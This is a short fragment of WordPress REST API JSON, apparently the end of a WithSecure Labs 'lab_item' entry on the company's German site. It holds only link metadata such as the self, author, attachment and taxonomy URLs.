<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item\/10574","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/media?parent=10574"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/categories?post=10574"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/labs_content_type?post=10574"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}